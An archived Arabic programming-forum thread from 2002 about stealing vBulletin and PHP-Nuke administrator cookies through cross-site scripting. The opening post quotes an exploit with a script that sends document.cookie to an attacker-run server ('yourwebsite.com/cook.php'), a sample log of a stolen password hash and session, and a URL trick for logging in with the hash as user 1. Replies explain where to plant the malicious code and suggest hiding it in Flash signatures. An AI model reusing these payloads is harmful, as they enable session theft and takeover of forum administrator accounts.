الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

سرقة كوكي مدير المنتدى او المجلة ...

مغلق
بدأه محمد قطان في 18 مارس 2002 · 8 رد · 942 مشاهدة · في منتدى الشبكات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

منذ فترة وصلني من خلال Mailing Lists لموقع securityfocus.com موضوع هام حول أمن المنتديات و سرقة كوكي الادمن من منتديات vBulletin عن طريق كود خدعة مثل وضع كود صورة او توقيع مثلا مع تضمنه لسيكربت يسرق الكوكي ممن يفتحه ........ وهذا بعض من نص الرسالة ...

------------ The Exploit: ------------

It involves a few different parts,

firstly some malicious scripting and then tricking the

forum into accepting data from the wrong place. First,

I post some malicious html in a reply to a topic that allows HTML:

 

 <script>document.write(''+document.cookie+'">';

When someone loads the page, the javascript echoes the contents of their cookies into the image source tag that points to a webserver on my machine, resulting in this kind of line in my access log:

 

GET
 /bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvi sit=1011983161

طبعا هذا الكود للاختبار ...ولكن صناعة كود لسرقة الكوكي سهل جدا ...

وهذه الثغرة تعمل على جميع الاصدارات قبل 2.2.1 وأعتقد انه تم تعديلها في الاصدار الذي يلي وهو 2.2.2

المهم ان الموقع انتهى الى حل وهو انه يجب الغاء السماح لجميع أكواد HTML و VB Code الى ان أصدر ترقية للنسخة ...

شركة vBulletin بدأت تستخدم خاصية تشفير الباسوورد بدءا من الاصدار 2.0.0 وما بعده ... وهو على ما اعتقد تشفير بمقياس MD5 ... ولكن تشفير الكوكي هو نفس التشفير في SQL المنتدى ...

إليكم بعض التجارب .... افتح الكوكي الخاص بالمنتدى ... ستجد فيه كالتالي :

 

bblastvisit
1013555716
www.server.com/
1536258608998429545196108049068829398447*bbuserid1141
www.server.com/
1536357608998429545196207312068829398447*bbpassword
3ba2edb61d6a3268cf9327b02f5ac3ec
www.server.com/1536357608998429545196207312068829398447*

الآن كلمة السر المشفرة هي ...

 
3ba2edb61d6a3268cf9327b02f5ac3ec

اي بين كلمتي bbpassword و www.server.com ...

وهي نفسها الموجودة في SQL ...

الآن قم بالخروج من المنتدى وهنا ستأتيك رسالة انه تم مسح الكوكي انتقل بعدها الى الصفحة الرئيسية للمنتدى ثم اكتب التالي بعد عنوان المنتدى ..

 
http://www.server.com/vb/index.php?s=&bbpa...WORD&bbuserid=1

مع تغيير PASSWORD بالباسوورد المشفرة التي وجدتها بالكوكي ... وكذلك الرقم الاخير ( 1 ) وهو عادة يكون للأدمن ... برقمك الشخصي بالمنتدى ...!!!

طريقة الدخول هذه تجدها في ملف member.php ضمن ملفات المنتدى ....

بالنسبة للسكربت الذي يسرق الكوكي فهذا مثال له :

 
[a
href="about://www.server.com/[script]window.open("http://www.yourwebsite
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9
remote root exploit ![/a]

(replace [ & ] by < & >)
www.server.com is the site that you want to get cookie.
www.yourwebsute.com is the site that will recieve the cookie thru the
cook.php script.

ويمكن استخدامها أيضا في مجلات PhpNuke لما قبل الاصدار 5.4 .. ولم أجربه على هذا الاصدار ....

اذا وجدتم منتديات فيها هذه الثغرة فأرجو ان تحذروهم منها لا ان تخترقوهم ...!!!!

لكم تحياتي ....(f) (f)

واثق الخطوة يمشي ملكا !!

#2

جزاك الله كل خير ممكن بس توضيح اكثر بالنسبة للخطوة الأخيرة

الله يرزقك الشهادة

امين

اخو الجميع نار قطر

#3

آميييييييين يا رب ... وان شاء الله واياكم ..

شكرا كتير والله هذا أحسن دعاء ...

ماهو الشيئ الذي لم تفهمه بالضبط ؟؟؟

وشكرا ..

واثق الخطوة يمشي ملكا !!

#4

اخوي الغالي

هذا هو الكود اللذي لم أفهمه

كود:

--------------------------------------------------------------------------------

[a

href="about ://www.server.com/[script]window.open("http://www.yourwebsite

.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9

remote root exploit ![/a]

(replace [ & ] by < & > )

www.server.com is the site that you want to get cookie.

www.yourwebsute.com is the site that will recieve the cookie thru the

cook.php script.

--------------------------------------------------------------------------------

وتقبل تحياتي والله يرزقك الحور العين وإيانا اجمعين

امين يارب

اخو الجميع نار قطر

#5

هذا هو بيت القصيد في الموضوع كله .. ولم يتم نشره في كل المواقع التي تكلمت عن الثغرة ....

وهو سكربت لجلب الكوكي وتضعه معظم المواقع وهو الكود الخبيث الذي سوف تضعه في المنتدى الذي ستتم سرقة الكوكي من مديره ....

ولكن يجب ان يكون عندك الموقع الذي سيستقبلها وهو المعبر عنه بـhttp://www.yourwebsite .....

أرجو ان اكون أوضحت وشكرا ...

واثق الخطوة يمشي ملكا !!

#6

تسلم أبو قطان حبيبي

ما قصرت الان وضحت الأمور

:)

إن للإخوان صرح كل مافيه حسن لاتسألني من بناه انه البنا حسن

#7

شكراً لك أخ محمد

بس أعتقد أنه حتى عند قفل الHTML يبقى الفلاش يستطيع فتح صفحة فيها البلاوي .

يعني من خلال توقيع فلاش بيحل القصة .

و بالنسبة للتشفير فما بعرف

قد ما يكون تشفير يعني من الممكن يكون Base64 encoding مثل تشفير باسووردات المواقع عند أرسالها بترويسات الـ HTTP .

#8

الف شكر اخي محمد

على المواضيع المتميزه

والى الامام ننتضر المزيد

#9

أهلين بالشباب ...

الاخ blackice هذا النوع من التشفير بدأت تستخدمه الشركة بعد الكثير من الضغوط عليها لان اي مخترق للداتا بيز او للوحة التحكم للمنتدى كان يرى الباسورردات كما هي ثم يستخدمها كيف شاء ووكان التشفير وسيلتهم للحد من ذلك وولكن كما ترى يمكن ان نستخدم الكلمة وهي مشفرة .... وذلك بالتحايل على الدخول واستخدام طريقة دخول أخرى ...

وأما بالنسبة لفك التشفير فأظن انه سهل وأنا حاليا اجري بعض التجارب عليه ...

فكرة زرع الكود الخبيث في ملف فلاش هي أفضل طريقة فعلا ...

اذا اردت التعمق أكثر في نوع التشفير والتجربة علية فيمكنك تنزيل نسخة منتدى على جهازك وتعمل تجارب عليها ... وأنا متأكد انك رح تلاقي بلاويييي ...

brave man أهلا بك ولا شكر على واجب .....

وأهلا بكم ...(f) (f)

واثق الخطوة يمشي ملكا !!

هذا الموضوع مغلق.

مواضيع مشابهة